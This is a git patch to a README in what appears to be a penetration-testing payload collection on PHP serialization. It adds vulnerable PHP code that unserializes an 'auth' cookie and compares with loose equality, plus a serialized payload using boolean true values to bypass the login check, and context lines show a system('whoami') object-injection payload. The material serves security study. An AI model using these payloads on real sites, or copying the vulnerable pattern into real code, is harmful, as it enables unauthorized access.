From d49e40b1b286bd4f486536db1f3406a31d7439b8 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Tue, 25 Sep 2018 23:59:29 +0200
Subject: [PATCH] add auth bypass

---
 PHP serialization/README.md | 25 ++++++++++++++++++++++++-
 1 file changed, 24 insertions(+), 1 deletion(-)

diff --git a/PHP serialization/README.md b/PHP serialization/README.md
index c237c468..a0c12576 100644
--- a/PHP serialization/README.md	
+++ b/PHP serialization/README.md	
@@ -43,6 +43,29 @@ string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}
 
 ```
 
+## Authentication bypass
+
+Vulnerable code:
+
+```php
+<?php
+$data = unserialize($_COOKIE['auth']);
+
+if ($data['username'] == $adminName && $data['password'] == $adminPassword) {
+    $admin = true;
+} else {
+    $admin = false;
+}
+```
+
+Payload:
+
+```
+a:2:{s:8:"username";b:1;s:8:"password";b:1;}
+```
+
+Because `true == "str"` is true. Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
+
 ## Others exploits
 
 Reverse Shell
@@ -74,4 +97,4 @@ echo urlencode(serialize(new PHPObjectInjection));
 ## Thanks to
 
 * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
-* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
\ No newline at end of file
+* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)